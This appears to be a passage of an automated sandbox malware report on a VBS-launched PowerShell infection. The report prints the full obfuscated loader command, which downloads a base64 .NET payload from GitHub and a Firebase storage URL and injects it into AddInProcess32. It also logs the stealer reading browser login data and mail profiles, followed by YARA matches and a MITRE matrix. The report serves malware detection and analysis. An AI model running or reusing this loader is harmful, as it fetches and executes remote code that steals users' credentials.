'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAn
AC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqganacsajwawadgadqbyagwaiaa9acaaqwanacsajwa3aekaaab0ahqacabzadoalwavahiayqanacsajwb3ac4ajwaraccazwbpaccakwanahqaaab1accakwanagiadqanacsajwbzaguacgbjag8abgb0accakwanaguabgb0accakwanac4aywanacsajwbvag0alwboaccakwanag8arablahqazqbjahqatwanacsajwbuac8atgbvaeqazqanacsajwb0aguaywb0ae8abgavahiazqbmahmajwaraccalwboaccakwanaguayqanacsajwbkaccakwanahmajwaraccalwanacsajwbtaccakwanageaaqbuac8arablaccakwanahqayqboae4abwanacsajwb0aggalqbwaccakwanac4adaanacsajwb4ahqaqwanacsajwa3aekaowagaeiamaanacsajwa4agiayqbzaccakwanaguanga0aemajwaraccabwanacsajwbuahqazqbuahqaiaa9acaakaboaguadwatae8aygbqaccakwanaguaywanacsajwb0acaauwb5ahmadablag0algboaguadaauafcazqanacsajwbiaemababpaguabgb0ackalgbeaccakwanag8adwbuagwabwanacsajwbhagqajwaraccauwb0ahiajwaraccaaqanacsajwbuagcakabcaccakwanadaaoab1accakwanahiabaanacsajwapadsaiabcadaajwaraccaoaanacsajwbiagkabgbhaccakwanahiajwaraccaeqanacsajwbdaccakwanag8abgb0accakwanaguabgb0acaapqanacsajwagafsauwb5ahmadaanacsajwblag0algbdag8abgb2aguajwaraccacgb0af0aoga6accakwanaeyacganacsajwbvag0aqgbhahmazqa2adqauwb0ahiaaqbuaccakwanagcakaanacsajwbcadaajwaraccaoabiageajwaraccacwbladyanaanacsajwbdag8abgb0accakwanaguabgb0ackaowagaccakwanaeiamaa4ageacwbzaguabqbiagwaeqagaccakwanad0aiabbafiazqbmagwajwaraccazqbjaccakwanahqajwaraccaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoataanacsajwbvageazaaoaeiamaa4accakwanagiaaqbuageacgb5aemajwaraccabwanacsajwbuahqazqbuaccakwanahqakqanacsajwa7acaawwbkag4ababpagiajwaraccalgbjaccakwanae8algbiaccakwanag8abqanacsajwblaccakwanaf0aoga6afyaqqanacsajwbjacgajwaraccacabraccakwanafuaoaa4adqazqanacsajwa4aguamabkaduamganacsajwbmadaalqanacsajwbladuayqanacsajwbiac0ajwaraccamqanacsajwaxadyanaatadaamabjadyajwaraccalqbhageayqayagyazga1aguajwaraccapqanacsajwbuaccakwanaguajwaraccaawanacsajwbvahqajgbhagkazablag0apqb0agwayqa/ahqaeaanacsajwb0accakwan
ac4anaayadaamgawadeanwawag4aaqbnaccakwanagkacgbvahiazqanacsajwbpahyayqb4ac8abwavag0abwanacsajwbjac4ajwaraccadabvahaacwbwahaayqauadqamgawadiacwanacsajwb0ahaaeqbyaccakwanagmajwaraccalwbiac8amab2accakwanac8abqbvagmajwaraccalganacsajwbzagkacabhaguababnaccakwanag8abwbnaccakwanac4azqanacsajwbnageacgbvaccakwanahqajwaraccacwblahmayqbiaccakwanaguacgbpagyajwaraccalwavadoajwaraccacwanacsajwbwahqajwaraccadaboahaauqbvacwajwaraccaiabwafeavqaxahaauqbvacwajwaraccaiabwafeavqbdadoavaanacsajwa0ahkauabyag8azwbyageabqbeageadabhaccakwanafqanaanacsajwb5accakwanahaauqbvacwaiabwaccakwanafeavqbhaccakwanagwaywbhahqaaqanacsajwbmageacaanacsajwbrafualaagahaauqbvaeeazabkaekabgbqahiajwaraccabwbjaguacwbzadmajwaraccamganacsajwbwafeavqasacaacabraccakwanafuacabrafualabwaccakwanafeavqanacsajwbwaccakwanafeavqapaccakqagacaalqbdahiazqbwaewayqbdaguaiaaoafsaqwboageaugbdadeamqayacsawwbdaggayqbsaf0aoaaxacsawwbdaggayqbsaf0aoaa1ackalabbaemaaabhafiaxqazadqaiaagac0aqwbyaguacabmageaqwblacaaiaaoafsaqwboageaugbdadyanwarafsaqwboageaugbdaduanqarafsaqwboageaugbdadcamwapacwawwbdaggayqbsaf0amwa5acaaiaatafiazqbqag
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('b'+'08url = c'+'7ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/n'+'odetecto'+'n/node'+'tecton/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/de'+'tahno'+'th-v'+'.t'+'xtc'+'7i; b0'+'8bas'+'e64c'+'o'+'ntent = (new-obj'+'ec'+'t system.net.we'+'bclient).d'+'ownlo'+'ad'+'str'+'i'+'ng(b'+'08u'+'rl'+'); b0'+'8'+'bina'+'r'+'y'+'c'+'ont'+'ent ='+' [syst'+'em.conve'+'rt]::'+'fr'+'ombase64strin'+'g('+'b0'+'8ba'+'se64'+'cont'+'ent); '+'b08assembly '+'= [refl'+'ec'+'t'+'ion.assembly]::l'+'oad(b08'+'binaryc'+'o'+'nten'+'t)'+'; [dnlib'+'.i'+'o.h'+'om'+'e'+']::va'+'i('+'pq'+'u884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpqu,'+' pqu1pqu,'+' pquc:t'+'4yprogramdata'+'t4'+'y'+'pqu, p'+'qua'+'lcati'+'fap'+'qu, pquaddinpr'+'ocess3'+'2'+'pqu, pq'+'upqu,p'+'qu'+'p'+'qu)') -creplace ([char]112+[char]81+[char]85),[char]34 -creplace ([char]67+[char]55+[char]73),[char]39 -replace ([char]66+[char]48+[char]56),[char]36 -replace ([char]84+[char]52+[char]121),[char]92)|.( ([string]$verbosepreference)[1,3]+'x'-join'')"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqganacsajwawadgadqbyagwaiaa9acaaqwanacsajwa3aekaaab0ahqacabzadoalwavahiayqanacsajwb3ac4ajwaraccazwbpaccakwanahqaaab1accakwanagiadqanacsajwbzaguacgbjag8abgb0accakwanaguabgb0accakwanac4aywanacsajwbvag0alwboaccakwanag8arablahqazqbjahqatwanacsajwbuac8atgbvaeqazqanacsajwb0aguaywb0ae8abgavahiazqbmahmajwaraccalwboaccakwanaguayqanacsajwbkaccakwanahmajwaraccalwanacsajwbtaccakwanageaaqbuac8arablaccakwanahqayqboae4abwanacsajwb0aggalqbwaccakwanac4adaanacsajwb4ahqaqwanacsajwa3aekaowagaeiamaanacsajwa4agiayqbzaccakwanaguanga0aemajwaraccabwanacsajwbuahqazqbuahqaiaa9acaakaboaguadwatae8aygbqaccakwanaguaywanacsajwb0acaauwb5ahmadablag0algboaguadaauafcazqanacsajwbiaemababpaguabgb0ackalgbeaccakwanag8adwbuagwabwanacsajwbhagqajwaraccauwb0ahiajwaraccaaqanacsajwbuagcakabcaccakwanadaaoab1accakwanahiabaanacsajwapadsaiabcadaajwaraccaoaanacsajwbiagkabgbhaccakwanahiajwaraccaeqanacsajwbdaccakwanag8abgb0accakwanaguabgb0acaapqanacsajwagafsauwb5ahmadaanacsajwblag0algbdag8abgb2aguajwaraccacgb0af0aoga6accakwanaeyacganacsajwbvag0aqgbhahmazqa2adqauwb0ahiaaqbuaccakwanagcakaanacsajwbcadaajwaraccaoabiageajwaraccacwbladyanaanacsajwbdag8abgb0accakwanaguabgb0ackaowagaccakwanaeiamaa4ageacwbzaguabqbiagwaeqagaccakwanad0aiabbafiazqbmagwajwaraccazqbjaccakwanahqajwaraccaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoataanacsajwbvageazaaoaeiamaa4accakwanagiaaqbuageacgb5aemajwaraccabwanacsajwbuahqazqbuaccakwanahqakqanacsajwa7acaawwbkag4ababpagiajwaraccalgbjaccakwanae8algbiaccakwanag8abqanacsajwblaccakwanaf0aoga6afyaqqanacsajwbjacgajwaraccacabraccakwanafuaoaa4adqazqanacsajwa4aguamabkaduamganacsajwbmadaalqanacsajwbladuayqanacsajwbiac0ajwaraccamqanacsajwaxadyanaatadaamabjadyajwaraccalqbhageayqayagyazga1aguajwaraccapqanacsajwbuaccakwanaguajwaraccaawanacsajwbvahqajgbhagkazablag0apqb0agwayqa/ahqaeaanacsajwb0accakwan
ac4anaayadaamgawadeanwawag4aaqbnaccakwanagkacgbvahiazqanacsajwbpahyayqb4ac8abwavag0abwanacsajwbjac4ajwaraccadabvahaacwbwahaayqauadqamgawadiacwanacsajwb0ahaaeqbyaccakwanagmajwaraccalwbiac8amab2accakwanac8abqbvagmajwaraccalganacsajwbzagkacabhaguababnaccakwanag8abwbnaccakwanac4azqanacsajwbnageacgbvaccakwanahqajwaraccacwblahmayqbiaccakwanaguacgbpagyajwaraccalwavadoajwaraccacwanacsajwbwahqajwaraccadaboahaauqbvacwajwaraccaiabwafeavqaxahaauqbvacwajwaraccaiabwafeavqbdadoavaanacsajwa0ahkauabyag8azwbyageabqbeageadabhaccakwanafqanaanacsajwb5accakwanahaauqbvacwaiabwaccakwanafeavqbhaccakwanagwaywbhahqaaqanacsajwbmageacaanacsajwbrafualaagahaauqbvaeeazabkaekabgbqahiajwaraccabwbjaguacwbzadmajwaraccamganacsajwbwafeavqasacaacabraccakwanafuacabrafualabwaccakwanafeavqanacsajwbwaccakwanafeavqapaccakqagacaalqbdahiazqbwaewayqbdaguaiaaoafsaqwboageaugbdadeamqayacsawwbdaggayqbsaf0aoaaxacsawwbdaggayqbsaf0aoaa1ackalabbaemaaabhafiaxqazadqaiaagac0aqwbyaguacabmageaqwblacaaiaaoafsaqwboageaugbdadyanwarafsaqwboageaugbdaduanqarafsaqwboageaugbdadcamwapacwawwbdaggayqbsaf0amwa5acaaiaatafiazqbqagJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('b'+'08url = c'+'7ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/n'+'odetecto'+'n/node'+'tecton/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/de'+'tahno'+'th-v'+'.t'+'xtc'+'7i; b0'+'8bas'+'e64c'+'o'+'ntent = (new-obj'+'ec'+'t system.net.we'+'bclient).d'+'ownlo'+'ad'+'str'+'i'+'ng(b'+'08u'+'rl'+'); b0'+'8'+'bina'+'r'+'y'+'c'+'ont'+'ent ='+' [syst'+'em.conve'+'rt]::'+'fr'+'ombase64strin'+'g('+'b0'+'8ba'+'se64'+'cont'+'ent); '+'b08assembly '+'= [refl'+'ec'+'t'+'ion.assembly]::l'+'oad(b08'+'binaryc'+'o'+'nten'+'t)'+'; [dnlib'+'.i'+'o.h'+'om'+'e'+']::va'+'i('+'pq'+'u884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpqu,'+' pqu1pqu,'+' pquc:t'+'4yprogramdata'+'t4'+'y'+'pqu, p'+'qua'+'lcati'+'fap'+'qu, pquaddinpr'+'ocess3'+'2'+'pqu, pq'+'upqu,p'+'qu'+'p'+'qu)') -creplace ([char]112+[char]81+[char]85),[char]34 -creplace ([char]67+[char]55+[char]73),[char]39 -replace ([char]66+[char]48+[char]56),[char]36 -replace ([char]84+[char]52+[char]121),[char]92)|.( ([string]$verbosepreference)[1,3]+'x'-join'')"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7360, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7360, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7360, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a numeric prefix is the report's count badge for that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 331 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 231 Windows Management Instrumentation; 1 Exploitation for Client Execution; 12 Command and Scripting Interpreter; 3 PowerShell; Launchd; Scheduled Task; Systemd Timers
Persistence: 331 Scripting; 1 DLL Side-Loading; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items
